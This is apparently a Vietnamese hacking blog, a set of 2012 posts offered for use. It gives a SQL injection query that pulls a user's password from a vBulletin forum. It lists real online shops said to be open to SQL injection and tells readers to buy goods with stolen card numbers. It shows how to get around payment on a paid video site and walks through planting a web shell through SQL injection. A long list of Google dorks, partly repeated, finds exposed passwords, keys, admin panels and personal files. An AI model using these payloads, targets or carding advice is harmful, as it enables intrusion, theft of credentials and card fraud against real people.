Đây là bản Download chỉ 6,6mb nhưng Extract ra là 400mb.
http://www.mediafire.com/?jemjpw964db53fm
Đây là đoạn code Querry mình sử dụng:
ajax.php?do=inforum&result=15&listforumid=-14 ) /*!union select*/ 1,2,3,4,5,6,password,8,9,10 from user where userid=1– -&result=15
Với userid=1 là số thứ tự của user mún lấy
Thứ Năm, 29 tháng 11, 2012
Thứ Bảy, 24 tháng 11, 2012
Này thì quần áo
Site Này Lâu Rồi Nhưng Chắc Chắn Newbie Vẫn Ăn Đc chưa share cho ai ca
Nguyên Liệu
Sock : US
Cứ Dùng CCN mà táng 2 Ngày là shipped
Hàng ở đây chấp lượng tax tùy
Thứ Năm, 22 tháng 11, 2012
Down JAV trên javhd.com max speed mà không tốn 1 xu nào
Thứ nhất là bạn vào javhd.com
Mở cái videos mà bạn muốn down. EXAMPLE: http://javhd.com/en/id/9946 chọn open new tab xong rồi nhấn vào nút play nó sẽ hiện link dạng này
Quan trong là bước này nek bạn chỉ cần để ý tới dòng màu xanh và coppy cái dòng đó rồi paste vào 2 chỗ
<coppy here> ở link dưới rồi bật IDM chọn add url rồi paste link màu đỏ vào rồi nhấn OK.Thà hồ cho anh em down nhé
Sau khi paste dòng màu xanh vào link màu đỏ bên dưới sẽ có link hoàn chỉnh dạng này :
Mở cái videos mà bạn muốn down. EXAMPLE: http://javhd.com/en/id/9946 chọn open new tab xong rồi nhấn vào nút play nó sẽ hiện link dạng này
http://enter.javhd.com/signup/signup...ep=2&....&dir=5-tw26098-rika-kitano-shizuka-nozomi-onuki-haruna-sakurai-hardcore-workout
<coppy here> ở link dưới rồi bật IDM chọn add url rồi paste link màu đỏ vào rồi nhấn OK.Thà hồ cho anh em down nhé
http://cdn.javhd.com/files/<Copy here>/videos/<Copy here>_sh.mp4?key=f2dfe339372ac2d12854fe3772566c9a& uid=1&us=1&gid=7310&time=1352110351&memberid=10297 7&start=0
SQL Vulnerable Shops UPDATE
http://www.mothergooseclub.com/store.php?category_id=10
www.nitro-helmets.com/product_category.php?category_id=47
http://www.bonide.com/products/category.php?category_id=6
http://www.prossalonsupply.com/products/category_view.php?category_id=5
http://www.labyrinthcompany.com/view_category.php?category_id=2
http://www.carldaviscollection.com/gallery2.php?category_id=2
http://www.bladerubberstamps.co.uk/onlinesales/shop.php?category_id=40
http://www.ringmusic.com/productlist.php?category_id=4
http://www.snowcan.com/shop/products/list.php?campaign_id=5
http://blog.emitations.com/links/category.php?category_id=65&tname=Jewelry
Thứ Tư, 21 tháng 11, 2012
TUT upshell qua lỗi SQLI
Ví dụ ở đây ta có 1 site lỗi
tiếp tục
tiếp nữa
và fuck thôi
Code:
http://devil-zone.net/vuln.php?id=[SQLINJ]
tiếp tục
Code:
http://devil-zone.net/vuln.php?id=1337 union all select 1,2,3,4,5,6,7,8/*
tiếp nữa
Code:
http://devil-zone.net/vuln.php?id=1337 union all select 1,2,3,4,5,0xshellcodeinhexhere,7,8 into dumpfile '/var/tmp/shell.php'/*
Code:
http://devil-zone.net/vuln.php?id=1337 union all select 1,2,3,4,5,Load_File('/var/tmp/shell.php'),7,8/*List Dork Google for hacking with google
admin account info" filetype:log
!Host=*.* intext:enc_UserPassword=* ext:pcf
"# -FrontPage-" ext:pwd inurlservice | authors |
administrators | users) "# -FrontPage-"
inurl:service.pwd
"AutoCreate=TRUE password=*"
"http://*:*@www" domainname
"index of/" "ws_ftp.ini" "parent directory"
"liveice configuration file" ext:cfg
-site:sourceforge.net
"parent directory" +proftpdpasswd
"
Duclassified" -site:duware.com "DUware All Rights
reserved"
"
duclassmate" -site:duware.com
"
Dudirectory" -site:duware.com
"
dudownload" -site:duware.com
"
Elite Forum Version *.*"
"
Link Department"
"sets mode: +k"
"your password is" filetype:log
"
DUpaypal" -site:duware.com
allinurl: admin mdb
auth_user_file.txt
config.php
eggdrop filetype:user user
enable password | secret "current configuration"
-intext:the
etc (index.of)
ext:asa | ext:bak intext:uid intext:pwd -"uid..pwd"
database | server | dsn
ext:inc "pwd=" "UID="
ext:ini eudora.ini
ext:ini Version=4.0.0.4 password
ext:passwd -intext:the -sample -example
ext:txt inurl:unattend.txt
ext:yml database inurl:config
filetype:bak createobject sa
filetype:bak inurl:"htaccess|passwd|shadow|htusers"
filetype:cfg mrtg "target
filetype:cfm "cfapplication name" password
filetype:conf oekakibbs
filetype:conf slapd.conf
filetype:config config intext:appSettings "User ID"
filetype:dat "password.dat"
filetype:dat inurl:Sites.dat
filetype:dat wand.dat
filetype:inc dbconn
filetype:inc intext:mysql_connect
filetype:inc mysql_connect OR mysql_pconnect
filetype:inf sysprep
filetype:ini inurl:"serv-u.ini"
filetype:ini inurl:flashFXP.ini
filetype:ini ServUDaemon
filetype:ini wcx_ftp
filetype:ini ws_ftp pwd
filetype:ldb admin
filetype:log "See `ipsec --copyright"
filetype:log inurl:"password.log"
filetype:mdb inurl:users.mdb
filetype:mdb wwforum
filetype:netrc password
filetype:pass pass intext:userid
filetype:pem intext:private
filetype:properties inurl:db intext:password
filetype:pwd service
filetype:pwl pwl
filetype:reg reg +intext:"defaultusername"
+intext:"defaultpassword"
filetype:reg reg +intext:â?�WINVNC3â?�
filetype:reg reg HKEY_CURRENT_USER SSHHOSTKEYS
filetype:sql "insert into" (pass|passwd|password)
filetype:sql ("values * MD5" | "values * password" |
"values * encrypt")
filetype:sql +"IDENTIFIED BY" -cvs
filetype:sql password
filetype:url +inurl:"ftp://" +inurl:";@"
filetypels username password email
htpasswd
htpasswd / htgroup
htpasswd / htpasswd.bak
intext:"enable password 7"
intext:"enable secret 5 $"
intext:"
EZGuestbook"
intext:"
Web Wiz Journal"
intitle:"index of" intext:connect.inc
intitle:"index of" intext:globals.inc
intitle:"Index of" passwords modified
intitle:"Index of" sc_serv.conf sc_serv content
intitle:"phpinfo()" +"mysql.default_password" +"Zend
Scripting Language Engine"
intitle:dupics inurladd.asp | default.asp | view.asp |
voting.asp) -site:duware.com
intitle:index.of administrators.pwd
intitle:Index.of etc shadow
intitle:index.of
intext:"secring.skr"|"secring.pgp"|"secring.bak"
intitle:rapidshare intext:login
inurl:"calendarscript/users.txt"
inurl:"editor/list.asp" | inurl:"database_editor.asp" |
inurl:"login.asa" "are set"
inurl:"GRC.DAT" intext:"password"
inurl:"Sites.dat"+"PASS="
inurl:"slapd.conf" intext:"credentials" -manpage
-"Manual Page" -man: -sample
inurl:"slapd.conf" intext:"rootpw" -manpage -"Manual
Page" -man: -sample
inurl:"wvdial.conf" intext:"password"
inurl:/db/main.mdb
inurl:/wwwboard
inurl:/yabb/Members/Admin.dat
inurl:ccbill filetype:log
inurl:cgi-bin inurl:calendar.cfg
inurl:chap-secrets -cvs
inurl:config.php dbuname dbpass
inurl:filezilla.xml -cvs
inurl:lilo.conf filetype:conf password -tatercounter2000
-bootpwd -man
inurl:nuke filetype:sql
inurl:ospfd.conf intext:password -sample -test -tutorial
-download
inurl:pap-secrets -cvs
inurl:pass.dat
inurl:perform filetype:ini
inurl:perform.ini filetype:ini
inurl:secring ext:skr | ext:pgp | ext:bak
inurl:server.cfg rcon password
inurl:ventrilo_srv.ini adminpassword
inurl:vtund.conf intext:pass -cvs
inurl:zebra.conf intext:password -sample -test -tutorial
-download
LeapFTP intitle:"index.of./" sites.ini modified
master.passwd
mysql history files
NickServ registration passwords
passlist
passlist.txt (a better way)
passwd
passwd / etc (reliable)
people.lst
psyBNC config files
pwd.db
server-dbs "intitle:index of"
signin filetype:url
spwd.db / passwd
trillian.ini
wwwboard WebAdmin inurl:passwd.txt wwwboard|webadmin
[WFClient] Password= filetype:ica
intitle:"remote assessment" OpenAanval Console
intitle:opengroupware.org "resistance is obsolete"
"Report Bugs" "Username" "password"
"bp blog admin" intitle:login | intitle:admin
-site:johnny.ihackstuff.com
"Emergisoft web applications are a part of our"
"Establishing a secure Integrated Lights Out session
with" OR intitle:"Data Frame - Browser not HTTP 1.1
compatible" OR intitle:"HP Integrated Lights-
"HostingAccelerator" intitle:"login" +"Username" -"news"
-demo
"iCONECT 4.1 :: Login"
"IMail Server Web Messaging" intitle:login
"inspanel" intitle:"login" -"cannot" "Login ID"
-site:inspediumsoft.com
"intitle:3300 Integrated Communications Platform"
inurl:main.htm
"Login - Sun Cobalt RaQ"
"login prompt" inurl:GM.cgi
"Login to Usermin" inurl:20000
"Microsoft CRM : Unsupported Browser Version"
"OPENSRS Domain Management" inurl:manage.cgi
"pcANYWHERE EXPRESS Java Client"
"Please authenticate yourself to get access to the
management interface"
"please log in"
"Please login with admin pass" -"leak" -sourceforge
"
CuteNews" "2003..2005 CutePHP"
"
DWMail" password intitle:dwmail
"
Merak Mail Server Software" -.gov -.mil -.edu
-site:merakmailserver.com
"
Midmart Messageboard" "Administrator Login"
"
Monster Top List" MTL numrange:200-
"
UebiMiau" -site:sourceforge.net
"site info for" "Enter Admin Password"
"SquirrelMail version" "By the SquirrelMail Development
Team"
"SysCP - login"
"This is a restricted Access Server" "Javascript Not
Enabled!"|"Messenger Express" -edu -ac
"This section is for Administrators only. If you are an
administrator then please"
"ttawlogin.cgi/?action="
"VHCS Pro ver" -demo
"VNC Desktop" inurl:5800
"Web-Based Management" "Please input password to login"
-inurl:johnny.ihackstuff.com
"WebExplorer Server - Login" "Welcome to WebExplorer
Server"
"WebSTAR Mail - Please Log In"
"You have requested access to a restricted area of our
website. Please authenticate yourself to continue."
"You have requested to access the management functions"
-.edu
(intitle:"Please login - Forums
UBB.threads")|(inurl:login.php "ubb")
(intitle:"Please login - Forums
WWWThreads")|(inurl:"wwwthreads/login.php")|(inurl:"wwwt
hreads/login.pl?Cat=")
(intitle:"rymo Login")|(intext:"Welcome to rymo")
-family
(intitle:"WmSC e-Cart
Administration")|(intitle:"WebMyStyle e-Cart
Administration")
(inurl:"ars/cgi-bin/arweb?O=0" | inurl:arweb.jsp)
-site:remedy.com -site:mil
4images Administration Control Panel
allintitle:"Welcome to the Cyclades"
allinurl:"exchange/logon.asp"
allinurl:wps/portal/ login
ASP.login_aspx "ASP.NET_SessionId"
CGI:IRC Login
ext:cgi intitle:"control panel" "enter your owner
password to continue!"
ez Publish administration
filetype:php inurl:"webeditor.php"
filetype:pl "Download: SuSE Linux Openexchange Server
CA"
filetype:r2w r2w
intext:""BiTBOARD v2.0" BiTSHiFTERS Bulletin Board"
intext:"Fill out the form below completely to change
your password and user name. If new username is left
blank, your old one will be assumed." -edu
intext:"Mail admins login here to administrate your
domain."
intext:"Master Account" "Domain Name" "Password"
inurl:/cgi-bin/qmailadmin
intext:"Master Account" "Domain Name" "Password"
inurl:/cgi-bin/qmailadmin
intext:"Storage Management Server for" intitle:"Server
Administration"
intext:"Welcome to" inurl:"cp" intitle:"H-SPHERE"
inurl:"begin.html" -Fee
intext:"vbulletin" inurl:admincp
intitle:"*- HP WBEM Login" | "You are being prompted to
provide login account information for *" | "Please
provide the information requested and press
intitle:"Admin Login" "admin login" "blogware"
intitle:"Admin login" "Web Site Administration"
"Copyright"
intitle:"AlternC Desktop"
intitle:"Athens Authentication Point"
intitle:"b2evo > Login form" "Login form. You must log
in! You will have to accept cookies in order to log in"
-demo -site:b2evolution.net
intitle:"Cisco CallManager User Options Log On" "Please
enter your User ID and Password in the spaces provided
below and click the Log On button to co
intitle:"ColdFusion Administrator Login"
intitle:"communigate pro * *" intitle:"entrance"
intitle:"Content Management System" "user
name"|"password"|"admin" "Microsoft IE 5.5" -mambo
intitle:"Content Management System" "user
name"|"password"|"admin" "Microsoft IE 5.5" -mambo
intitle:"Dell Remote Access Controller"
intitle:"Docutek ERes - Admin Login" -edu
intitle:"Employee Intranet Login"
intitle:"eMule *" intitle:"- Web Control Panel"
intext:"Web Control Panel" "Enter your password here."
intitle:"ePowerSwitch Login"
intitle:"eXist Database Administration" -demo
intitle:"EXTRANET * - Identification"
intitle:"EXTRANET login" -.edu -.mil -.gov
intitle:"EZPartner" -netpond
intitle:"Flash Operator Panel" -ext:php -wiki -cms
-inurl:asternic -inurl:sip -intitle:ANNOUNCE
-inurl:lists
intitle:"i-secure v1.1" -edu
intitle:"Icecast Administration Admin Page"
intitle:"iDevAffiliate - admin" -demo
intitle:"ISPMan : Unauthorized Access prohibited"
intitle:"ITS System Information" "Please log on to the
SAP System"
intitle:"Kurant Corporation StoreSense" filetype:bok
intitle:"ListMail Login" admin -demo
intitle:"Login -
Easy File Sharing Web Server"
intitle:"Login Forum
AnyBoard" intitle:"If you are a new user:" intext:"Forum
AnyBoard" inurl:gochat -edu
intitle:"Login to @Mail" (ext:pl | inurl:"index")
-dwaffleman
intitle:"Login to Cacti"
intitle:"Login to the forums - @www.aimoo.com"
inurl:login.cfm?id=
intitle:"MailMan Login"
intitle:"Member Login" "NOTE: Your browser must have
cookies enabled in order to log into the site." ext:php
OR ext:cgi
intitle:"Merak Mail Server Web Administration"
-ihackstuff.com
intitle:"microsoft certificate services" inurl:certsrv
intitle:"MikroTik RouterOS Managing Webpage"
intitle:"MX Control Console" "If you can't remember"
intitle:"Novell Web Services" "GroupWise"
-inurl:"doc/11924" -.mil -.edu -.gov -filetype:pdf
intitle:"Novell Web Services" intext:"Select a service
and a language."
intitle:"oMail-admin Administration - Login"
-inurl:omnis.ch
intitle:"OnLine Recruitment Program - Login"
intitle:"Philex 0.2*" -script -site:freelists.org
intitle:"PHP Advanced Transfer" inurl:"login.php"
intitle:"php icalendar administration"
-site:sourceforge.net
intitle:"php icalendar administration"
-site:sourceforge.net
intitle:"phpPgAdmin - Login" Language
intitle:"PHProjekt - login" login password
intitle:"please login" "your password is *"
intitle:"Remote Desktop Web Connection" inurl:tsweb
intitle:"SFXAdmin - sfx_global" | intitle:"SFXAdmin -
sfx_local" | intitle:"SFXAdmin - sfx_test"
intitle:"SHOUTcast Administrator" inurl:admin.cgi
intitle:"site administration: please log in" "site
designed by emarketsouth"
intitle:"Supero Doctor III" -inurl:supermicro
intitle:"SuSE Linux Openexchange Server" "Please
activate JavaScript!"
intitle:"teamspeak server-administration
intitle:"Tomcat Server Administration"
intitle:"TOPdesk ApplicationServer"
intitle:"TUTOS Login"
intitle:"TWIG Login"
intitle:"vhost" intext:"vHost . 2000-2004"
intitle:"Virtual Server Administration System"
intitle:"VisNetic WebMail" inurl:"/mail/"
intitle:"VitalQIP IP Management System"
intitle:"VMware Management Interface:"
inurl:"vmware/en/"
intitle:"VNC viewer for Java"
intitle:"web-cyradm"|"by Luc de Louw" "This is only for
authorized users" -tar.gz -site:web-cyradm.org
intitle:"WebLogic Server" intitle:"Console Login"
inurl:console
intitle:"Welcome Site/User Administrator" "Please select
the language" -demos
intitle:"Welcome to Mailtraq WebMail"
intitle:"welcome to netware *" -site:novell.com
intitle:"WorldClient" intext:"? (2003|2004) Alt-N
Technologies."
intitle:"xams 0.0.0..15 - Login"
intitle:"XcAuctionLite" | "DRIVEN BY XCENT" Lite
inurl:admin
intitle:"XMail Web Administration Interface"
intext:Login intext:password
intitle:"Zope Help System" inurl:HelpSys
intitle:"ZyXEL Prestige Router" "Enter password"
intitle:"inc. vpn 3000 concentrator"
intitle"TrackerCam Live Video")|("TrackerCam
Application Login")|("Trackercam Remote")
-trackercam.com
intitle:asterisk.management.portal web-access
intitle:endymion.sak?.mail.login.page |
inurl:sake.servlet
intitle:Group-Office "Enter your username and password
to login"
intitle:ilohamail "
IlohaMail"
intitle:ilohamail intext:"Version 0.8.10" "
IlohaMail"
intitle:IMP inurl:imp/index.php3
intitle:Login * Webmailer
intitle:Login intext:"RT is ? Copyright"
intitle:Node.List Win32.Version.3.11
intitle:Novell intitle:WebAccess "Copyright *-* Novell,
Inc"
intitle:open-xchange inurl:login.pl
intitle:Ovislink inurl:private/login
intitle:phpnews.login
intitle:plesk inurl:login.php3
inurl:"/admin/configuration. php?" Mystore
inurl:"/slxweb.dll/external?name=(custportal|webticketcu
st)"
inurl:"1220/parse_xml.cgi?"
inurl:"631/admin" (inurl:"op=*") | (intitle:CUPS)
inurl:":10000" intext:webmin
inurl:"Activex/default.htm" "Demo"
inurl:"calendar.asp?action=login"
inurl:"default/login.php" intitle:"kerio"
inurl:"gs/adminlogin.aspx"
inurl:"php121login.php"
inurl:"suse/login.pl"
inurl:"typo3/index.php?u=" -demo
inurl:"usysinfo?login=true"
inurl:"utilities/TreeView.asp"
inurl:"vsadmin/login" | inurl:"vsadmin/admin"
inurl:.php|.asp
nurl:/admin/login.asp
inurl:/cgi-bin/sqwebmail?noframes=1
inurl:/Citrix/Nfuse17/
inurl:/dana-na/auth/welcome.html
inurl:/eprise/
inurl:/Merchant2/admin.mv | inurl:/Merchant2/admin.mvc |
intitle:"Miva Merchant Administration Login"
-inurl:cheap-malboro.net
inurl:/modcp/ intext:Moderator+vBulletin
inurl:/SUSAdmin intitle:"Microsoft Software Update
Services"
inurl:/webedit.* intext:WebEdit Professional -html
inurl:1810 "Oracle Enterprise Manager"
inurl:2000 intitle:RemotelyAnywhere -site:realvnc.com
inurl::2082/frontend -demo
inurl:administrator "welcome to mambo"
inurl:bin.welcome.sh | inurl:bin.welcome.bat |
intitle:eHealth.5.0
inurl:cgi-bin/ultimatebb.cgi?ubb=login
inurl:Citrix/MetaFrame/default/default.aspx
inurl:confixx inurl:login|anmeldung
inurl:coranto.cgi intitle:Login (Authorized Users Only)
inurl:csCreatePro.cgi
inurl:default.asp intitle:"WebCommander"
inurl:exchweb/bin/auth/owalogon.asp
inurl:gnatsweb.pl
inurl:ids5web
inurl:irc filetype:cgi cgi:irc
inurl:login filetype:swf swf
inurl:login.asp
inurl:login.cfm
inurl:login.php "SquirrelMail version"
inurl:metaframexp/default/login.asp | intitle:"Metaframe
XP Login"
inurl:mewebmail
inurl:names.nsf?opendatabase
inurl:ocw_login_username
inurl:orasso.wwsso_app_admin.ls_login
inurl:postfixadmin intitle:"postfix admin" ext:php
inurl:search/admin.php
inurl:textpattern/index.php
inurl:WCP_USER
inurl:webmail./index.pl "Interface"
inurl:webvpn.html "login" "Please enter your"
Login ("
Jetbox One CMS â?¢" | "
Jetstream ? *")
Novell NetWare intext:"netware management portal
version"
Outlook Web Access (a better way)
PhotoPost PHP Upload
PHPhotoalbum Statistics
PHPhotoalbum Upload
phpWebMail
Please enter a valid password! inurl:polladmin
INDEXU
Ultima Online loginservers
W-Nailer Upload Area
intitle:"DocuShare" inurl:"docushare/dsweb/" -faq -gov
-edu
"#mysql dump" filetype:sql
"#mysql dump" filetype:sql
21232f297a57a5a743894a0e4a801fc3
"allow_call_time_pass_reference" "PATH_INFO"
"Certificate Practice Statement" inurlPDF | DOC)
"Generated by phpSystem"
"generated by wwwstat"
"Host Vulnerability Summary Report"
"HTTP_FROM=googlebot" googlebot.com "Server_Software="
"Index of" / "chat/logs"
"Installed Objects Scanner" inurl:default.asp
"MacHTTP" filetype:log inurl:machttp.log
"Mecury Version" "Infastructure Group"
"Microsoft ® Windows * ™ Version * DrWtsn32
Copyright ©" ext:log
"Most Submitted Forms and Scripts" "this section"
"Network Vulnerability Assessment Report"
"not for distribution" confidential
"not for public release" -.edu -.gov -.mil
"phone * * *" "address *" "e-mail" intitle:"curriculum
vitae"
"phpMyAdmin" "running on" inurl:"main.php"
"produced by getstats"
"Request Details" "Control Tree" "Server Variables"
"robots.txt" "Disallow:" filetype:txt
"Running in Child mode"
"sets mode: +p"
"sets mode: +s"
"Thank you for your order" +receipt
"This is a Shareaza Node"
"This report was generated by WebLog"
( filetype:mail | filetype:eml | filetype:mbox |
filetype:mbx ) intext:password|subject
(intitle:"PRTG Traffic Grapher"
inurl:"allsensors")|(intitle:"PRTG Traffic Grapher -
Monitoring Results")
(intitle:WebStatistica inurl:main.php) |
(intitle:"WebSTATISTICA server") -inurl:statsoft
-inurl:statsoftsa -inurl:statsoftinc.com -edu -software
-rob
(inurl:"robot.txt" | inurl:"robots.txt" )
intext:disallow filetype:txt
+":8080" +":3128" +":80" filetype:txt
+"HSTSNR" -"netop.com"
-site:php.net -"The PHP Group" inurl:source inurl:url
ext:pHp
94FBR "ADOBE PHOTOSHOP"
AIM buddy lists
allinurl:/examples/jsp/snp/snoop.jsp
allinurl:cdkey.txt
allinurl:servlet/SnoopServlet
cgiirc.conf
cgiirc.conf
contacts ext:wml
data filetype:mdb -site:gov -site:mil
exported email addresses
extdoc | pdf | xls | txt | ps | rtf | odt | sxw | psw
| ppt | pps | xml) (intext:confidential salary |
intext:"budget approved") inurl:confidential
ext:asp inurl:pathto.asp
ext:ccm ccm -catacomb
ext:CDX CDX
ext:cgi inurl:editcgi.cgi inurl:file=
ext:conf inurl:rsyncd.conf -cvs -man
ext:conf NoCatAuth -cvs
ext:dat bpk.dat
ext:gho gho
ext:ics ics
ext:ini intext:env.ini
ext:jbf jbf
ext:ldif ldif
ext:log "Software: Microsoft Internet Information
Services *.*"
ext:mdb inurl:*.mdb inurl:fpdb shop.mdb
ext:nsf nsf -gov -mil
ext:plist filetype:plist inurl:bookmarks.plist
ext:pqi pqi -database
ext:reg "username=*" putty
ext:txt "Final encryption key"
ext:txt inurl:dxdiag
ext:vmdk vmdk
ext:vmx vmx
filetype:asp DBQ=" * Server.MapPath("*.mdb")
filetype:bkf bkf
filetype:blt "buddylist"
filetype:blt blt +intext:screenname
filetype:cfg auto_inst.cfg
filetype:cnf inurl:_vti_pvt access.cnf
filetype:conf inurl:firewall -intitle:cvs
filetype:config web.config -CVS
filetype:ctt Contact
filetype:ctt ctt messenger
filetype:eml eml +intext:"Subject" +intext:"From"
+intext:"To"
filetype:fp3 fp3
filetype:fp5 fp5 -site:gov -site:mil -"cvs log"
filetype:fp7 fp7
filetype:inf inurl:capolicy.inf
filetype:lic lic intext:key
filetype:log access.log -CVS
filetype:log cron.log
filetype:mbx mbx intext:Subject
filetype:myd myd -CVS
filetype:ns1 ns1
filetype:ora ora
filetype:ora tnsnames
filetype:pdb pdb backup (Pilot | Pluckerdb)
filetype:php inurl:index inurl:phpicalendar
-site:sourceforge.net
filetype:pot inurl:john.pot
filetypeS ps
filetype:pst inurl:"outlook.pst"
filetype:pst pst -from -to -date
filetype:qbb qbb
filetype:QBW qbw
filetype:rdp rdp
filetype:reg "Terminal Server Client"
filetype:vcs vcs
filetype:wab wab
filetypels -site:gov inurl:contact
filetypels inurl:"email.xls"
Financial spreadsheets: finance.xls
Financial spreadsheets: finances.xls
Ganglia Cluster Reports
haccess.ctl (one way)
haccess.ctl (VERY reliable)
ICQ chat logs, please...
intext:"Session Start * * * *:*:* *" filetype:log
intext:"Tobias Oetiker" "traffic analysis"
intextpassword | passcode) intextusername | userid |
user) filetype:csv
intext:gmail invite
intext:http://gmail.google.com/gmail/a
intext:SQLiteManager inurl:main.php
intext:ViewCVS inurl:Settings.php
intitle:"admin panel" +"
RedKernel"
intitle:"Apache::Status" (inurl:server-status |
inurl:status.html | inurl:apache.html)
intitle:"AppServ Open Project"
-site:www.appservnetwork.com
intitle:"ASP Stats Generator *.*" "ASP Stats Generator"
"2003-2004 weppos"
intitle:"Big Sister" +"OK Attention Trouble"
intitle:"curriculum vitae" filetype:doc
intitle:"edna:streaming mp3 server" -forums
intitle:"FTP root at"
intitle:"index of" +myd size
intitle:"Index Of" -inurl:maillog maillog size
intitle:"Index Of" cookies.txt size
intitle:"index of" mysql.conf OR mysql_config
intitle:"Index of" upload size parent directory
intitle:"index.of *" admin news.asp configview.asp
intitle:"index.of" .diz .nfo last modified
intitle:"Joomla - Web Installer"
intitle:"LOGREP - Log file reporting system"
-site:itefix.no
intitle:"Multimon UPS status page"
intitle:"PHP Advanced Transfer" (inurl:index.php |
inurl:showrecent.php )
intitle:"PhpMyExplorer" inurl:"index.php" -cvs
intitle:"statistics of" "advanced web statistics"
intitle:"System Statistics" +"System and Network
Information Center"
intitle:"urchin (5|3|admin)" ext:cgi
intitle:"Usage Statistics for" "Generated by Webalizer"
intitle:"wbem" compaq login "Compaq Information
Technologies Group"
intitle:"Web Server Statistics for ****"
intitle:"web server status" SSH Telnet
intitle:"Welcome to F-Secure Policy Manager Server
Welcome Page"
intitle:"welcome.to.squeezebox"
intitle:admin intitle:login
intitle:Bookmarks inurl:bookmarks.html "Bookmarks
intitle:index.of "Apache" "server at"
intitle:index.of cleanup.log
intitle:index.of dead.letter
intitle:index.of inbox
intitle:index.of inbox dbx
intitle:index.of ws_ftp.ini
intitle:intranet inurl:intranet +intext:"phone"
inurl:"/axs/ax-admin.pl" -script
inurl:"/cricket/grapher.cgi"
inurl:"bookmark.htm"
inurl:"cacti" +inurl:"graph_view.php" +"Settings Tree
View" -cvs -RPM
inurl:"newsletter/admin/"
inurl:"newsletter/admin/" intitle:"newsletter admin"
inurl:"putty.reg"
inurl:"smb.conf" intext:"workgroup" filetype:conf conf
inurl:*db filetype:mdb
inurl:/cgi-bin/pass.txt
inurl:/_layouts/settings
inurl:admin filetypels
inurl:admin intitle:login
inurl:backup filetype:mdb
inurl:build.err
inurl:cgi-bin/printenv
inurl:cgi-bin/testcgi.exe "Please distribute TestCGI"
inurl:changepassword.asp
inurl:ds.py
inurl:email filetype:mdb
inurl:fcgi-bin/echo
inurl:forum filetype:mdb
inurl:forward filetype:forward -cvs
inurl:getmsg.html intitle:hotmail
inurl:log.nsf -gov
inurl:main.php phpMyAdmin
inurl:main.php Welcome to phpMyAdmin
inurl:netscape.hst
inurl:netscape.hst
inurl:netscape.ini
inurl:odbc.ini ext:ini -cvs
inurl:perl/printenv
inurl:php.ini filetype:ini
inurl:preferences.ini "[emule]"
inurl:profiles filetype:mdb
inurl:report "EVEREST Home Edition "
inurl:server-info "Apache Server Information"
inurl:server-status "apache"
inurl:snitz_forums_2000.mdb
inurl:ssl.conf filetype:conf
inurl:tdbin
inurl:vbstats.php "page generated"
inurl:wp-mail.php + "There doesn't seem to be any new
mail."
inurl:XcCDONTS.asp
ipsec.conf
ipsec.secrets
ipsec.secrets
Lotus Domino address books
mail filetype:csv -site:gov intext:name
Microsoft Money Data Files
mt-db-pass.cgi files
MySQL tabledata dumps
mystuff.xml - Trillian data files
OWA Public Folders (direct view)
Peoples MSN contact lists
php-addressbook "This is the addressbook for *" -warning
phpinfo()
phpMyAdmin dumps
phpMyAdmin dumps
private key files (.csr)
private key files (.key)
Quicken data files
rdbqds -site:.edu -site:.mil -site:.gov
robots.txt
site:edu admin grades
site:www.mailinator.com inurl:ShowMail.do
SQL data dumps
Squid cache server reports
Unreal IRCd
WebLog Referrers
Welcome to ntop!
!Host=*.* intext:enc_UserPassword=* ext:pcf
"# -FrontPage-" ext:pwd inurlservice | authors |
administrators | users) "# -FrontPage-"
inurl:service.pwd
"AutoCreate=TRUE password=*"
"http://*:*@www" domainname
"index of/" "ws_ftp.ini" "parent directory"
"liveice configuration file" ext:cfg
-site:sourceforge.net
"parent directory" +proftpdpasswd
"
Duclassified" -site:duware.com "DUware All Rights
reserved"
"
duclassmate" -site:duware.com
"
Dudirectory" -site:duware.com
"
dudownload" -site:duware.com
"
Elite Forum Version *.*"
"
Link Department"
"sets mode: +k"
"your password is" filetype:log
"
DUpaypal" -site:duware.com
allinurl: admin mdb
auth_user_file.txt
config.php
eggdrop filetype:user user
enable password | secret "current configuration"
-intext:the
etc (index.of)
ext:asa | ext:bak intext:uid intext:pwd -"uid..pwd"
database | server | dsn
ext:inc "pwd=" "UID="
ext:ini eudora.ini
ext:ini Version=4.0.0.4 password
ext:passwd -intext:the -sample -example
ext:txt inurl:unattend.txt
ext:yml database inurl:config
filetype:bak createobject sa
filetype:bak inurl:"htaccess|passwd|shadow|htusers"
filetype:cfg mrtg "target
filetype:cfm "cfapplication name" password
filetype:conf oekakibbs
filetype:conf slapd.conf
filetype:config config intext:appSettings "User ID"
filetype:dat "password.dat"
filetype:dat inurl:Sites.dat
filetype:dat wand.dat
filetype:inc dbconn
filetype:inc intext:mysql_connect
filetype:inc mysql_connect OR mysql_pconnect
filetype:inf sysprep
filetype:ini inurl:"serv-u.ini"
filetype:ini inurl:flashFXP.ini
filetype:ini ServUDaemon
filetype:ini wcx_ftp
filetype:ini ws_ftp pwd
filetype:ldb admin
filetype:log "See `ipsec --copyright"
filetype:log inurl:"password.log"
filetype:mdb inurl:users.mdb
filetype:mdb wwforum
filetype:netrc password
filetype:pass pass intext:userid
filetype:pem intext:private
filetype:properties inurl:db intext:password
filetype:pwd service
filetype:pwl pwl
filetype:reg reg +intext:"defaultusername"
+intext:"defaultpassword"
filetype:reg reg +intext:â?�WINVNC3â?�
filetype:reg reg HKEY_CURRENT_USER SSHHOSTKEYS
filetype:sql "insert into" (pass|passwd|password)
filetype:sql ("values * MD5" | "values * password" |
"values * encrypt")
filetype:sql +"IDENTIFIED BY" -cvs
filetype:sql password
filetype:url +inurl:"ftp://" +inurl:";@"
filetypels username password email
htpasswd
htpasswd / htgroup
htpasswd / htpasswd.bak
intext:"enable password 7"
intext:"enable secret 5 $"
intext:"
EZGuestbook"
intext:"
Web Wiz Journal"
intitle:"index of" intext:connect.inc
intitle:"index of" intext:globals.inc
intitle:"Index of" passwords modified
intitle:"Index of" sc_serv.conf sc_serv content
intitle:"phpinfo()" +"mysql.default_password" +"Zend
Scripting Language Engine"
intitle:dupics inurladd.asp | default.asp | view.asp |
voting.asp) -site:duware.com
intitle:index.of administrators.pwd
intitle:Index.of etc shadow
intitle:index.of
intext:"secring.skr"|"secring.pgp"|"secring.bak"
intitle:rapidshare intext:login
inurl:"calendarscript/users.txt"
inurl:"editor/list.asp" | inurl:"database_editor.asp" |
inurl:"login.asa" "are set"
inurl:"GRC.DAT" intext:"password"
inurl:"Sites.dat"+"PASS="
inurl:"slapd.conf" intext:"credentials" -manpage
-"Manual Page" -man: -sample
inurl:"slapd.conf" intext:"rootpw" -manpage -"Manual
Page" -man: -sample
inurl:"wvdial.conf" intext:"password"
inurl:/db/main.mdb
